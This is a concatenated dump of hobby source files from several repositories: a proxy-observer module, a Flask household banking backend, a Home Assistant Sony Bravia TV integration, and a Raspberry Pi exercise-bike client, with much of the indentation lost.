for observer in self.observers:
for url in observer.urls:
observer_vars = self.observers_vars[observer.ip][url]
for var in observer_vars:
if var == name:
if len(value):
if observer_vars[var] == value:
                                result.add(observer)
else:
                            result.add(observer)
return result
def check_img(self,md5):
for observer in self.observers:
for url in observer.urls:
if md5 == self.observers_map[observer.ip].get_address(url).image_hash:
return True
return False
#Go through the observers looking for the ones that have the variables
def get_img_observers(self,md5):
result = Set()
for observer in self.observers:
for url in observer.urls:
observer_md5 = self.observers_map[observer.ip].get_address(url).image_hash
if observer_md5 == md5:
result.add((url,observer))
return result
def set_processed(self,observer1,observer2,url,m_type):
name = "%s-%s" % (observer1.get_address(url).image_hash, observer2.get_address(url).image_hash)
self.processed[m_type][url][name] = 1
def get_processed(self,observer1,observer2,url,m_type):
name1 = "%s-%s" % (observer1.get_address(url).image_hash, observer2.get_address(url).image_hash)
name2 = "%s-%s" % (observer2.get_address(url).image_hash, observer1.get_address(url).image_hash)
return self.processed[m_type][url][name1] or self.processed[m_type][url][name2]
def close(self):
for observer in self.observers:
for url in observer.urls:
addr = observer.get_address(url)
addr.driver.close()
addr.driver.quit()
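# Usage sketch (assumed, not part of the original module): the options object
# and proxy list below are placeholders for whatever the surrounding CLI builds.
#     target = Target("example", ["http://example.com"], proxy_ips, options)
#     target.process()
#     target.report()
#     target.close()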
```
#### File: abnormal/tests/test_general.py
```python
from abnormal import AB
import proxies
def get_proxies():
return proxies.get_proxies()
def test_create_ab():
ab = AB(get_proxies())
assert ab
def test_get_proxies():
working_proxies = get_proxies()
assert len(working_proxies) > 100
``` |
{
"source": "89erik/localbank",
"score": 3
} |
#### File: localbank/backend/app.py
```python
from flask import Flask, request, json
from pymongo import MongoClient
from bson import json_util
from bson.objectid import ObjectId
import dateutil.parser
import valutta
from errors import ApiException, Forbidden, NotFound, BadRequest
import dto
app = Flask(__name__)
db = MongoClient("localhost", 27017).localbank
valuttaer = valutta.alle_valuttaer()
@app.route('/<bank>/transaksjon', methods=["POST", "PUT"])
def post_transaksjon(bank):
dto = request.json
krev_tilgang_til_bank(bank)
prev = db.transaksjoner.find_one({"_id": ObjectId(dto["id"])}) if request.method == "PUT" else None
if prev:
if prev["bank"] != bank:
raise BadRequest("Klienten gjorde PUT transaksjon/%s på id=%s, men denne IDen har bank=%s" % (bank, dto["id"], prev["bank"]))
if prev.get("deleted", False):
raise BadRequest("Klienten gjorde PUT transaksjon på id=%s, men denne transaksjonen er slettet" % dto["id"])
transaksjon = {
"bank": bank,
"fra": dto["fra"],
"til": dto["til"],
"belop": float(dto["belop"]),
"kommentar": dto["kommentar"] if "kommentar" in dto else "",
"timestamp": dateutil.parser.parse(dto["timestamp"])
}
if dto["valutta"] != "NOK":
belop_NOK, kurs, kursTimestamp = valutta.konverter_til_NOK(transaksjon["belop"], dto["valutta"], transaksjon["timestamp"])
opprinnligBelop = transaksjon["belop"]
transaksjon["belop"] = belop_NOK
transaksjon["valutta"] = {
"belop": opprinnligBelop,
"id": dto["valutta"],
"kurs": kurs,
"timestamp": kursTimestamp
}
if prev:
transaksjon["forgjenger"] = prev["_id"]
insertion = db.transaksjoner.insert_one(transaksjon)
if prev:
db.transaksjoner.find_one_and_update({"_id": prev["_id"]}, {"$set": {"etterkommer": insertion.inserted_id, "deleted": True}})
return no_content()
@app.route('/transaksjon/<transaksjonId>', methods=['DELETE'])
def delete_transaksjon(transaksjonId):
bank = db.transaksjoner.find_one({"_id": ObjectId(transaksjonId)})["bank"]
krev_tilgang_til_bank(bank)
db.transaksjoner.find_one_and_update({"_id": ObjectId(transaksjonId)}, {"$set": {"deleted": True}})
return no_content()
def etterkommere(transaksjon):
if "etterkommer" in transaksjon:
etterkommer = db.transaksjoner.find_one({"_id": ObjectId(transaksjon["etterkommer"])})
return [etterkommer] + etterkommere(etterkommer)
else:
return []
def forgjengere(transaksjon):
if "forgjenger" in transaksjon:
forgjenger = db.transaksjoner.find_one({"_id": ObjectId(transaksjon["forgjenger"])})
return forgjengere(forgjenger) + [forgjenger]
else:
return []
@app.route('/transaksjon/restore/<transaksjonId>', methods=['PUT'])
def restore_transaksjon(transaksjonId):
transaksjon = db.transaksjoner.find_one({"_id": ObjectId(transaksjonId)})
krev_tilgang_til_bank(transaksjon["bank"])
if not transaksjon.get("deleted", False):
raise Exception("Prøvde å restore transaksjon %s som ikke er slettet" % transaksjon["_id"])
if any(not t.get("deleted", False) for t in forgjengere(transaksjon) + etterkommere(transaksjon)):
raise Exception("Prøvde å restore transaksjon %s, men denne har en aktiv forgjenger eller etterkommer" % transaksjon["_id"])
db.transaksjoner.find_one_and_update({"_id": ObjectId(transaksjonId)}, {"$set": {"deleted": False}})
return no_content()
@app.route('/<bank>/transaksjoner', methods=['GET'])
def get_transaksjoner(bank):
krev_tilgang_til_bank(bank)
transaksjoner = db.transaksjoner.find({"bank": bank})
return json.dumps(map(dto.transaksjon, transaksjoner))
def hent_bruker_fra_db():
brukernavn = request.environ.get('REMOTE_USER') or "LAN"
bruker = db.brukere.find_one({"brukernavn": brukernavn})
if not bruker:
raise Forbidden("Bruker %s har ingen tilknytning til localbank" % brukernavn)
return bruker
@app.route("/kontekst")
@app.route("/<bank>/kontekst")
def get_kontekst(bank = None):
bruker = hent_bruker_fra_db()
bank = bank or bruker["defaultBank"]
if bank not in bruker["banker"]:
raise Forbidden("Du har ikke tilgang til bank '%s'" % bank)
kontoer = db.kontoer.find({"bank": bank})
return json.dumps({
"valgtBank": bank,
"bruker": {
"brukernavn": bruker["brukernavn"],
"banker": bruker["banker"],
"admin": bruker.get("admin", False)
},
"kontoer": map(dto.konto, kontoer),
"valuttaer": valuttaer
})
@app.route("/brukere", methods=["GET"])
def get_brukere():
krev_admin()
return json.dumps(map(lambda bruker: {
"brukernavn": bruker["brukernavn"],
"banker": bruker["banker"],
"defaultBank": bruker["defaultBank"]
}, db.brukere.find()))
@app.route("/brukere", methods = ["POST"])
def post_bruker():
krev_admin()
if "defaultBank" not in request.json:
raise BadRequest("Mangler default bank")
bruker = {
"brukernavn": request.json["brukernavn"],
"banker": request.json["banker"],
"defaultBank": request.json["defaultBank"]
}
if not bruker["defaultBank"] or bruker["defaultBank"] not in bruker["banker"]:
raise BadRequest("Default bank (%s) finnes ikke i banker: %s" % (bruker["defaultBank"], bruker["banker"]))
db.brukere.update({"brukernavn": bruker["brukernavn"]}, {"$set": bruker}, upsert=True)
return no_content()
@app.route("/banker")
def get_banker():
krev_admin()
alle_kontoer = list(db.kontoer.find())
def kontoer(bank): return filter(lambda konto: bank == konto["bank"], alle_kontoer)
return json.dumps(map(lambda bank: {
"navn": bank,
"kontoer": map(dto.konto, kontoer(bank))
}, set(map(lambda konto: konto["bank"], alle_kontoer))))
def flatten(lists):
return [y for x in lists for y in x]
@app.route("/banker", methods = ["POST"])
def post_bank():
krev_admin()
bankId = request.json["navn"]
kontoer = map(lambda konto: {
"bank": bankId,
"navn": konto["navn"],
"felles": konto["felles"]
}, request.json["kontoer"])
bank_finnes = bankId in db.kontoer.distinct("bank")
antall_felleskontoer = len(filter(lambda konto: konto["felles"], kontoer))
if antall_felleskontoer != 1:
raise BadRequest("Prøvde å %s bank med %d felleskontoer" % ("PUT-e" if bankId else "POST-e", antall_felleskontoer))
if bank_finnes:
eksisterende_kontoer = frozenset(map(lambda konto: konto["navn"], db.kontoer.find({"bank": bankId})))
nye_kontoer = frozenset(map(lambda konto: konto["navn"], kontoer))
fjernede_kontoer = eksisterende_kontoer.difference(nye_kontoer)
if fjernede_kontoer:
har_transaksjon = flatten(map(lambda konto: [{"fra": konto}, {"til": konto}], fjernede_kontoer))
transaksjoner = list(db.transaksjoner.find({"bank": bankId, "$or": har_transaksjon}))
if transaksjoner:
kontoer_i_transaksjoner = flatten(map(lambda t: [t["fra"], t["til"]], transaksjoner))
fjernede_kontoer_med_transaksjoner = filter(lambda k: k in kontoer_i_transaksjoner,fjernede_kontoer)
raise BadRequest("Kan ikke fjerne kontoer som har transaksjoner: %s" % json.dumps(fjernede_kontoer_med_transaksjoner))
db.kontoer.delete_many({"bank": bankId})
db.kontoer.insert_many(kontoer)
return no_content()
@app.route("/<bank>/konto", methods = ["PUT"])
def put_konto(bank):
krev_admin()
dto = request.json
gammel_konto = db.kontoer.find_one({"_id": ObjectId(dto["id"])})
if bank != gammel_konto["bank"]:
raise BadRequest("Kan ikke flytte konto til annen bank")
if dto["navn"] != gammel_konto["navn"]:
raise BadRequest("Kan ikke bytte navn på konto")
if dto["felles"] != gammel_konto["felles"]:
raise BadRequest("Kan ikke endre på felles")
ny_konto = {
"navn": dto["navn"],
"bank": bank,
"felles": dto["felles"]
}
if dto.get("til"):
ny_konto["til"] = dateutil.parser.parse(dto["til"])
if dto.get("fra"):
ny_konto["fra"] = dateutil.parser.parse(dto["fra"])
db.kontoer.update({"_id": ObjectId(dto["id"])}, ny_konto)
return no_content()
def krev_tilgang_til_bank(bank):
bruker = hent_bruker_fra_db()
if not bank in bruker["banker"] and not bruker.get("admin", False):
raise Forbidden("Du har ikke tilgang til bank '%s'" % bank)
def krev_admin():
if not hent_bruker_fra_db().get("admin", False):
raise Forbidden("Krever admintilgang")
def no_content():
return ("", 204)
@app.errorhandler(Exception)
def handle_error(error):
is_known_error = isinstance(error, ApiException)
app.log_exception(error)
status_code = error.status_code if is_known_error else 500
message = error.message if is_known_error else "%s: %s" % (type(error).__name__, error)
return (message, status_code)
if __name__ == '__main__':
app.run(debug=True,host='0.0.0.0', port=5000)
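# Usage sketch (assumed, not part of the original file): with the dev server
# above running, a transaction could be posted roughly like this; the bank name
# "minbank" and the account names are placeholders.
#     import requests
#     requests.post('http://localhost:5000/minbank/transaksjon', json={
#         'fra': 'felles', 'til': 'kasse', 'belop': 100,
#         'valutta': 'NOK', 'timestamp': '2020-01-01T12:00:00'})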
```
#### File: localbank/backend/errors.py
```python
class ApiException(Exception):
pass
class Forbidden(ApiException):
def __init__(self, message):
self.message = message
self.status_code = 403
class NotFound(ApiException):
def __init__(self, message):
self.message = message
self.status_code = 404
class BadRequest(ApiException):
def __init__(self, message):
self.message = message
self.status_code = 400
``` |
{
"source": "89jd/media_player.braviatv_psk",
"score": 2
} |
#### File: custom_components/braviatv_psk/media_player.py
```python
import urllib.parse as urlparse
from urllib.parse import parse_qs
import logging
import asyncio
import homeassistant.helpers.config_validation as cv
import voluptuous as vol
from homeassistant.const import (
ATTR_ENTITY_ID,
CONF_HOST,
CONF_MAC,
CONF_NAME,
STATE_OFF,
STATE_ON,
)
from .const import (
DOMAIN,
CONF_12H,
CONF_24H,
CONF_PSK,
CONF_AMP,
CONF_ANDROID,
CONF_SOURCE_FILTER,
CONF_TIME_FORMAT,
CONF_USER_LABELS,
CONF_ENABLE_COOKIES,
CONF_USE_CEC_TITLES,
CONF_USE_CEC_URIS
)
from homeassistant.config_entries import ConfigEntry
from homeassistant.core import HomeAssistant
try:
from homeassistant.components.media_player import MediaPlayerEntity
except ImportError:
from homeassistant.components.media_player import (
MediaPlayerDevice as MediaPlayerEntity
)
try:
from homeassistant.components.media_player.const import (
SUPPORT_NEXT_TRACK,
SUPPORT_PAUSE,
SUPPORT_PREVIOUS_TRACK,
SUPPORT_TURN_ON,
SUPPORT_TURN_OFF,
SUPPORT_VOLUME_MUTE,
SUPPORT_PLAY,
SUPPORT_PLAY_MEDIA,
SUPPORT_VOLUME_STEP,
SUPPORT_VOLUME_SET,
SUPPORT_SELECT_SOURCE,
SUPPORT_STOP,
MEDIA_TYPE_TVSHOW,
)
except ImportError:
from homeassistant.components.media_player import (
SUPPORT_NEXT_TRACK,
SUPPORT_PAUSE,
SUPPORT_PREVIOUS_TRACK,
SUPPORT_TURN_ON,
SUPPORT_TURN_OFF,
SUPPORT_VOLUME_MUTE,
SUPPORT_PLAY,
SUPPORT_PLAY_MEDIA,
SUPPORT_VOLUME_STEP,
SUPPORT_VOLUME_SET,
SUPPORT_SELECT_SOURCE,
SUPPORT_STOP,
MEDIA_TYPE_TVSHOW,
)
__version__ = "0.3.5"
_LOGGER = logging.getLogger(__name__)
SUPPORT_BRAVIA = (
SUPPORT_PAUSE
| SUPPORT_VOLUME_STEP
| SUPPORT_VOLUME_MUTE
| SUPPORT_VOLUME_SET
| SUPPORT_PREVIOUS_TRACK
| SUPPORT_NEXT_TRACK
| SUPPORT_TURN_ON
| SUPPORT_TURN_OFF
| SUPPORT_PLAY_MEDIA
| SUPPORT_SELECT_SOURCE
| SUPPORT_PLAY
| SUPPORT_STOP
)
DEFAULT_NAME = "Sony Bravia TV"
DEVICE_CLASS_TV = "tv"
# Some additional info to show specific for Sony Bravia TV
TV_WAIT = "TV started, waiting for program info"
TV_APP_OPENED = "App opened"
TV_NO_INFO = "No info (resumed after pause or app opened)"
PLAY_MEDIA_OPTIONS = [
"Num1",
"Num2",
"Num3",
"Num4",
"Num5",
"Num6",
"Num7",
"Num8",
"Num9",
"Num0",
"Num11",
"Num12",
"Netflix",
"Red",
"Green",
"Yellow",
"Blue",
"ChannelUp",
"ChannelDown",
"Up",
"Down",
"Left",
"Right",
"Display",
"Tv",
"Confirm",
"Home",
"EPG",
"Return",
"Options",
"Exit",
"Teletext",
"Input",
"TvPause",
"Play",
"Pause",
"Stop",
"HDMI 1",
"HDMI 2",
"HDMI 3",
"HDMI 4",
"SleepTimer",
"GooglePlay",
]
SERVICE_BRAVIA_COMMAND = "bravia_command"
SERVICE_BRAVIA_LIST_APPS ="bravia_list_apps"
SERVICE_BRAVIA_OPEN_APP = "bravia_open_app"
ATTR_COMMAND_ID = "command_id"
ATTR_URI = "uri"
BRAVIA_COMMAND_SCHEMA = vol.Schema(
{
vol.Required(ATTR_ENTITY_ID): cv.entity_ids,
vol.Required(ATTR_COMMAND_ID): cv.string,
}
)
BRAVIA_OPEN_APP_SCHEMA = vol.Schema(
{vol.Required(ATTR_ENTITY_ID): cv.entity_ids, vol.Required(ATTR_URI): cv.string}
)
BRAVIA_LIST_APPS_SCHEMA = vol.Schema(
{vol.Required(ATTR_ENTITY_ID): cv.entity_ids})
# pylint: disable=unused-argument
def convert_time_format(time_format, time_raw):
"""Convert time format."""
if time_format == CONF_12H:
hours, minutes = time_raw.split(":")
hours, minutes = int(hours), int(minutes)
setting = "AM"
if hours > 12:
setting = "PM"
hours -= 12
elif hours == 0:
hours = 12
return "{}:{:02d} {}".format(hours, minutes, setting)
return time_raw
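# Examples (not part of the original file) of convert_time_format:
#     convert_time_format(CONF_12H, "14:05")  ->  "2:05 PM"
#     convert_time_format(CONF_12H, "00:30")  ->  "12:30 AM"
#     convert_time_format(CONF_24H, "14:05")  ->  "14:05"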
def remove_app_entities(hass):
for entity_id in hass.states.async_entity_ids(domain_filter='app'):
hass.states.async_remove(entity_id)
async def async_setup_entry(hass: HomeAssistant, config: ConfigEntry, async_add_devices, discovery_info=None):
"""Set up the Sony Bravia TV platform."""
host = config.data.get(CONF_HOST)
psk = config.data.get(CONF_PSK)
mac = config.data.get(CONF_MAC)
name = config.data.get(CONF_NAME)
amp = config.data.get(CONF_AMP)
android = config.data.get(CONF_ANDROID)
source_filter = config.data.get(CONF_SOURCE_FILTER)
time_format = config.data.get(CONF_TIME_FORMAT)
user_labels = config.data.get(CONF_USER_LABELS)
enable_cookies = config.data.get(CONF_ENABLE_COOKIES)
use_cec_titles = config.data.get(CONF_USE_CEC_TITLES)
use_cec_uris = config.data.get(CONF_USE_CEC_URIS)
if host is None or psk is None:
_LOGGER.error("No TV IP address or Pre-Shared Key found in configuration file")
return
from braviarc import braviarc
braviarc = braviarc.BraviaRC(host, psk, mac)
sys_info = await hass.async_add_executor_job(
braviarc.get_system_info
)
unique_id = sys_info['serial']
model = sys_info['model']
device = BraviaTVEntity(
braviarc, unique_id, model, host, psk, mac, name, amp, android, source_filter, time_format, user_labels, enable_cookies, use_cec_titles, use_cec_uris
)
async_add_devices([device])
def send_command(call):
"""Send command to TV."""
command_id = call.data.get(ATTR_COMMAND_ID)
device.send_command(command_id)
def open_app(call):
"""Open app on TV."""
uri = call.data.get(ATTR_URI)
device.open_app(uri)
def list_apps(call):
device.list_apps()
hass.services.async_register(
DOMAIN, SERVICE_BRAVIA_COMMAND, send_command, schema=BRAVIA_COMMAND_SCHEMA
)
# Only add the open_app service when TV is Android
if android:
hass.services.async_register(
DOMAIN, SERVICE_BRAVIA_OPEN_APP, open_app, schema=BRAVIA_OPEN_APP_SCHEMA
)
hass.services.async_register(
DOMAIN, SERVICE_BRAVIA_LIST_APPS, list_apps, schema=BRAVIA_LIST_APPS_SCHEMA
)
remove_app_entities(hass)
class BraviaTVEntity(MediaPlayerEntity):
"""Representation of a Sony Bravia TV."""
def __init__(
self,
braviarc,
unique_id,
model,
host,
psk,
mac,
name,
amp,
android,
source_filter,
time_format,
user_labels,
enable_cookies,
use_cec_titles,
use_cec_uris
):
"""Initialize the Sony Bravia device."""
_LOGGER.info("Setting up Sony Bravia TV")
self._braviarc = braviarc
self._name = name
self._amp = amp
self._android = android
self._source_filter = source_filter
self._state = STATE_OFF
self._muted = False
self._program_name = None
self._channel_name = None
self._channel_number = None
self._source = None
self._source_list = []
self._label_list = []
self._content_mapping = {}
self._duration = None
self._content_uri = None
self._playing = False
self._start_date_time = None
self._program_media_type = None
self._min_volume = None
self._max_volume = None
self._volume = None
self._start_time = None
self._end_time = None
self._device_class = DEVICE_CLASS_TV
self._time_format = time_format
self._user_labels = user_labels
self._enable_cookies = enable_cookies
self._app_list = []
self._use_cec_titles = use_cec_titles
self._use_cec_uris = use_cec_uris
self._unique_id = unique_id
self._model = model
_LOGGER.debug(
"Set up Sony Bravia TV with IP: %s, PSK: %s, MAC: %s, Serial: %s", host, psk, mac, unique_id
)
async def async_update(self):
"""Update TV info."""
try:
if self._enable_cookies and not self._braviarc.is_connected():
await self.hass.async_add_executor_job(
self._braviarc.connect, None, 'hass', 'Home assistant'
)
power_status = await self.hass.async_add_executor_job(
self._braviarc.get_power_status
)
if not self._app_list or power_status == "active":
app_list = await self.hass.async_add_executor_job(
self._braviarc.load_app_list
)
if self._app_list != app_list:
self._app_list = app_list
remove_app_entities(self.hass)
for app in self._app_list:
app_entity_name = app['title']
app_entity_name = ''.join(e for e in app_entity_name if e.isalnum())
app_entity_name = 'app.%s_%s' % (app_entity_name, self._unique_id)
self.hass.states.async_set(app_entity_name, None, {
'name': app['title'],
'entity_picture' : app['icon'] ,
'friendly_name': app['title'].replace(' ', '\n'),
'package': app['uri'],
})
if not self._source_list or power_status == "active":
await self._refresh_channels()
if power_status == "active":
self._state = STATE_ON
await self._refresh_volume()
playing_info = await self.hass.async_add_executor_job(
self._braviarc.get_playing_info
)
self._reset_playing_info()
if playing_info is None or not playing_info:
self._program_name = TV_NO_INFO
else:
self._program_name = playing_info.get("programTitle")
self._channel_name = playing_info.get("title")
self._program_media_type = playing_info.get("programMediaType")
self._channel_number = playing_info.get("dispNum")
self._source = playing_info.get("title")
self._content_uri = playing_info.get("uri")
self._duration = playing_info.get("durationSec")
self._start_date_time = playing_info.get("startDateTime")
# Get time info from TV program
if self._start_date_time and self._duration:
time_info = self._braviarc.playing_time(
self._start_date_time, self._duration
)
self._start_time = time_info.get("start_time")
self._end_time = time_info.get("end_time")
elif self._program_name == TV_WAIT:
# TV is starting up, takes some time before it responds
_LOGGER.info("TV is starting, no info available yet")
# elif power_status == "standby":
# self._refresh_channels()
# self._state = STATE_OFF
else:
self._state = STATE_OFF
except Exception as exception_instance: # pylint: disable=broad-except
_LOGGER.exception(
"No data received from TV."
)
self._state = STATE_OFF
def _reset_playing_info(self):
self._program_name = None
self._channel_name = None
self._program_media_type = None
self._channel_number = None
self._source = None
self._content_uri = None
self._duration = None
self._start_date_time = None
self._start_time = None
self._end_time = None
async def _refresh_volume(self):
"""Refresh volume information."""
volume_info = await self.hass.async_add_executor_job(self._braviarc.get_volume_info)
if volume_info is not None:
self._volume = volume_info.get("volume")
self._min_volume = volume_info.get("minVolume")
self._max_volume = volume_info.get("maxVolume")
self._muted = volume_info.get("mute")
async def _refresh_channels(self):
def is_hdmi(uri):
return uri.startswith('extInput:hdmi')
def is_cec(uri):
return uri.startswith('extInput:cec')
self._content_mapping = await self.hass.async_add_executor_job(self._braviarc.load_source_list)
self._source_list = []
external_inputs = []
        if self._source_filter:  # list is not empty
            source_mapping = {
                title: uri
                for (title, uri) in self._content_mapping.items()
                if any(
                    filter_title in title for filter_title in self._source_filter
                )
            }
        else:
            source_mapping = self._content_mapping
        # only sources passing the filter (when configured) are considered below
        for title, uri in source_mapping.items():
            if is_hdmi(uri) or is_cec(uri):
                external_inputs.append((title, uri))
            else:
                self._source_list.append(title)
merged_inputs = {}
for title, uri in external_inputs:
port = parse_qs(urlparse.urlparse(uri).query)['port'][0]
if port in merged_inputs:
merged_item = merged_inputs[port]
else:
merged_item = {}
if is_hdmi(uri):
merged_item['hdmi_title'] = title
merged_item['hdmi_uri'] = uri
else:
merged_item['cec_title'] = title
merged_item['cec_uri'] = uri
merged_inputs[port] = merged_item
for port, data in merged_inputs.items():
hdmi_title = data.get('hdmi_title')
hdmi_uri = data.get('hdmi_uri')
cec_title = data.get('cec_title')
cec_uri = data.get('cec_uri')
if hdmi_uri and cec_uri:
title = cec_title if self._use_cec_titles else hdmi_title
uri = cec_uri if self._use_cec_uris else hdmi_uri
elif not hdmi_uri and not cec_uri:
continue
else:
uri = hdmi_uri if hdmi_uri else cec_uri
title = hdmi_title if hdmi_title else cec_title
self._source_list.append(title)
if not self._label_list:
self._label_list = await self.hass.async_add_executor_job(self._braviarc.get_current_external_input_status)
if self._label_list:
for key in self._source_list:
label = self._convert_title_to_label(key)
if label != key:
self._source_list.insert(self._source_list.index(key), label)
self._source_list.remove(key)
@property
def name(self):
"""Return the name of the entity."""
return self._name
@property
def unique_id(self):
"""Return the unique ID of the entity."""
return self._unique_id
@property
def state(self):
"""Return the state of the entity."""
return self._state
@property
def source(self):
"""Return the current input source."""
return self._convert_title_to_label(self._source)
@property
def source_list(self):
"""List of available input sources."""
return self._source_list
@property
def volume_level(self):
"""Volume level of the media player (0..1)."""
if self._volume is not None:
return self._volume / 100
return None
@property
def is_volume_muted(self):
"""Boolean if volume is currently muted."""
return self._muted
@property
def supported_features(self):
"""Flag media player features that are supported."""
supported = SUPPORT_BRAVIA
# Remove volume slider if amplifier is attached to TV
if self._amp:
supported = supported ^ SUPPORT_VOLUME_SET
return supported
@property
def media_content_type(self):
"""Content type of current playing media.
Used for program information below the channel in the state card.
"""
return MEDIA_TYPE_TVSHOW
@property
def media_title(self):
"""Title of current playing media.
Used to show TV channel info.
"""
return_value = None
if self._channel_name is not None:
if self._channel_number is not None:
return_value = "{0!s}: {1}".format(
self._channel_number.lstrip("0"), self._channel_name
)
else:
return_value = self._channel_name
return self._convert_title_to_label(return_value)
@property
def media_series_title(self):
"""Title of series of current playing media, TV show only.
Used to show TV program info.
"""
return_value = None
if self._program_name is not None:
if self._start_time is not None and self._end_time is not None:
return_value = "{0} [{1} - {2}]".format(
self._program_name,
convert_time_format(self._time_format, self._start_time),
convert_time_format(self._time_format, self._end_time),
)
else:
return_value = self._program_name
else:
if not self._channel_name: # This is empty when app is opened
return_value = TV_APP_OPENED
return return_value
@property
def media_content_id(self):
"""Content ID of current playing media."""
return self._channel_name
@property
def device_class(self):
"""Return the device class of the media player."""
return self._device_class
@property
def state_attributes(self):
attributes = super().state_attributes
if not attributes:
return {
"app_list": self._app_list
}
else:
attributes['app_list'] = self._app_list
return attributes
@property
def device_info(self):
return {
"identifiers": {
# Serial numbers are unique identifiers within a specific domain
(DOMAIN, self._unique_id)
},
"name": self.name,
"manufacturer": 'Sony',
"model": self._model
}
async def async_set_volume_level(self, volume):
"""Set volume level, range 0..1."""
await self.hass.async_add_executor_job(
self._braviarc.set_volume_level, volume
)
async def async_turn_on(self):
"""Turn the media player on.
Use a different command for Android as WOL is not working.
"""
if self._android:
await self.hass.async_add_executor_job(
self._braviarc.turn_on_command
)
else:
await self.hass.async_add_executor_job(
self._braviarc.turn_on
)
# Show that TV is starting while it takes time
# before program info is available
self._reset_playing_info()
self._state = STATE_ON
self._program_name = TV_WAIT
async def async_turn_off(self):
"""Turn the media player off.
Use a different command for Android since IRCC is not working reliable.
"""
if self._android:
await self.hass.async_add_executor_job(
self._braviarc.turn_off_command
)
else:
await self.hass.async_add_executor_job(
self._braviarc.turn_off
)
async def async_volume_up(self):
"""Volume up the media player."""
await self.hass.async_add_executor_job(
self._braviarc.volume_up
)
async def volume_down(self):
"""Volume down media player."""
await self.hass.async_add_executor_job(
self._braviarc.volume_down
)
async def mute_volume(self, mute):
"""Send mute command."""
await self.hass.async_add_executor_job(
self._braviarc.mute_volume
)
async def select_source(self, source):
"""Set the input source."""
title = self._convert_label_to_title(source)
if title in self._content_mapping:
uri = self._content_mapping[title]
await self.hass.async_add_executor_job(
self._braviarc.play_content, uri
)
async def media_play_pause(self):
"""Simulate play pause media player."""
if self._playing:
await self.media_pause()
else:
await self.media_play()
async def media_play(self):
"""Send play command."""
self._playing = True
await self.hass.async_add_executor_job(
self._braviarc.media_play
)
async def media_pause(self):
"""Send media pause command to media player.
Will pause TV when TV tuner is on.
"""
self._playing = False
if self._program_media_type == "tv" or self._program_name is not None:
await self.hass.async_add_executor_job(
self._braviarc.media_tvpause
)
else:
await self.hass.async_add_executor_job(
self._braviarc.media_pause
)
async def media_next_track(self):
"""Send next track command.
Will switch to next channel when TV tuner is on.
"""
if self._program_media_type == "tv" or self._program_name is not None:
await self.hass.async_add_executor_job(
self._braviarc.send_command, "ChannelUp"
)
else:
await self.hass.async_add_executor_job(
self._braviarc.media_next_track
)
async def media_previous_track(self):
"""Send the previous track command.
Will switch to previous channel when TV tuner is on.
"""
if self._program_media_type == "tv" or self._program_name is not None:
await self.hass.async_add_executor_job(
self._braviarc.send_command, "ChannelDown"
)
else:
await self.hass.async_add_executor_job(
self._braviarc.media_previous_track
)
async def play_media(self, media_type, media_id, **kwargs):
"""Play media."""
_LOGGER.debug("Play media: %s (%s)", media_id, media_type)
if media_id in PLAY_MEDIA_OPTIONS:
await self.hass.async_add_executor_job(
self._braviarc.send_command, media_id
)
else:
_LOGGER.warning("Unsupported media_id: %s", media_id)
async def send_command(self, command_id):
"""Send arbitrary command to TV via HA service."""
if self._state == STATE_OFF:
return
await self.hass.async_add_executor_job(
self._braviarc.send_command, command_id
)
def open_app(self, uri):
self._braviarc.start_app(uri)
def list_apps(self):
"""Open app with given uri."""
app_list = self._braviarc.load_app_list()
return app_list
def _convert_title_to_label(self, title):
return_value = title
if self._user_labels:
for item in self._label_list:
if item["title"] == title and item["label"] != "":
return_value = item["label"]
return return_value
def _convert_label_to_title(self, label):
return_value = label
if self._user_labels:
for item in self._label_list:
if item["label"] == label and item["title"] != "":
return_value = item["title"]
return return_value
``` |
{
"source": "89jd/pi-bike-python-client",
"score": 2
} |
#### File: 89jd/pi-bike-python-client/client.py
```python
from frontend import DISPLAYS
from frontend.tracking import TrackingScreen
from remote import RemoteControlThread
from client import SocketClient
from threading import Thread
import time
import sys, signal
import config
import waveshare
from pi import ButtonSensor
output_property = config.properties.output_type
remote_properties = getattr(config.properties, 'remote', None)
pi_properties = getattr(config.properties, 'pi_gpio', None)
debug = len(sys.argv) > 1 and sys.argv[1] == 'debug'
if __name__ == "__main__":
socket_client = SocketClient()
output = DISPLAYS[output_property]
tracking_screen = TrackingScreen(socket_client, output=output)
def signal_handler(sig, frame):
sys.exit(0)
signal.signal(signal.SIGTERM, signal_handler)
while True:
try:
print('connect')
socket_client.start()
break
except Exception as e:
print(e)
pass
time.sleep(1)
def reset_exercise():
socket_client.emit('reset_exercise')
def toggle_pause_exercise():
socket_client.emit('toggle_pause')
def wake():
output.switch_backlight(True)
def delay_and_switch_off():
time.sleep(10)
if tracking_screen.is_idle:
output.switch_backlight(False)
        Thread(daemon=True, target=delay_and_switch_off).start()
def button_name_to_lambda(button_name):
if button_name == 'reset_button':
return reset_exercise
elif button_name == 'pause_button':
return toggle_pause_exercise
elif button_name == 'wake_button':
return wake
if remote_properties:
button_to_action = {}
for key, value in vars(remote_properties.buttons).items():
button_to_action[value] = button_name_to_lambda(key)
def on_button_clicked(button, state):
if debug:
print(button, state)
action = button_to_action.get(button)
if action and state == 0:
action()
RemoteControlThread(remote_properties.device_id, on_button_clicked, debug=debug).start()
if pi_properties:
pin_to_action = {}
for key, value in vars(pi_properties.buttons).items():
pin_to_action[value.pin] = button_name_to_lambda(key)
def on_pin(pin: int):
action = pin_to_action.get(pin)
if action:
action()
ButtonSensor(vars(pi_properties.buttons).values(), on_pin=on_pin)
```
#### File: pi-bike-python-client/remote/__init__.py
```python
import evdev
import threading
import time
class RemoteControlThread(threading.Thread):
def __init__(self, device_id:str, on_key, debug: bool = False) -> None:
super().__init__(daemon=True)
self.device_id = device_id
self.on_key = on_key
self.debug = debug
def print_debug_log(self, s: str):
if self.debug:
print(s)
def run(self) -> None:
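# Keep retrying until the configured input device exists, then forward every EV_KEY event to the callback.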
while True:
try:
device = evdev.InputDevice(self.device_id)
self.print_debug_log('Input device found')
for event in device.read_loop():
if event.type == evdev.ecodes.EV_KEY:
self.on_key(event.code, event.value)
except FileNotFoundError:
if self.debug:
self.print_debug_log('Input device not found')
time.sleep(1)
if __name__ == "__main__":
RemoteControlThread(print).start()
while True:
time.sleep(1)
``` |
{
"source": "89jd/pi-bike-server",
"score": 3
} |
#### File: pi-bike-server/firebase/__init__.py
```python
import firebase_admin
from firebase_admin import credentials
from firebase_admin import firestore
from firebase_admin import messaging
import uuid
from utils import print_debug
from config import properties
firebase_properties = getattr(properties, "firebase", None)
cred = credentials.Certificate("firebase.json")
firebase_admin.initialize_app(cred)
class Firebase():
def __init__(self) -> None:
super().__init__()
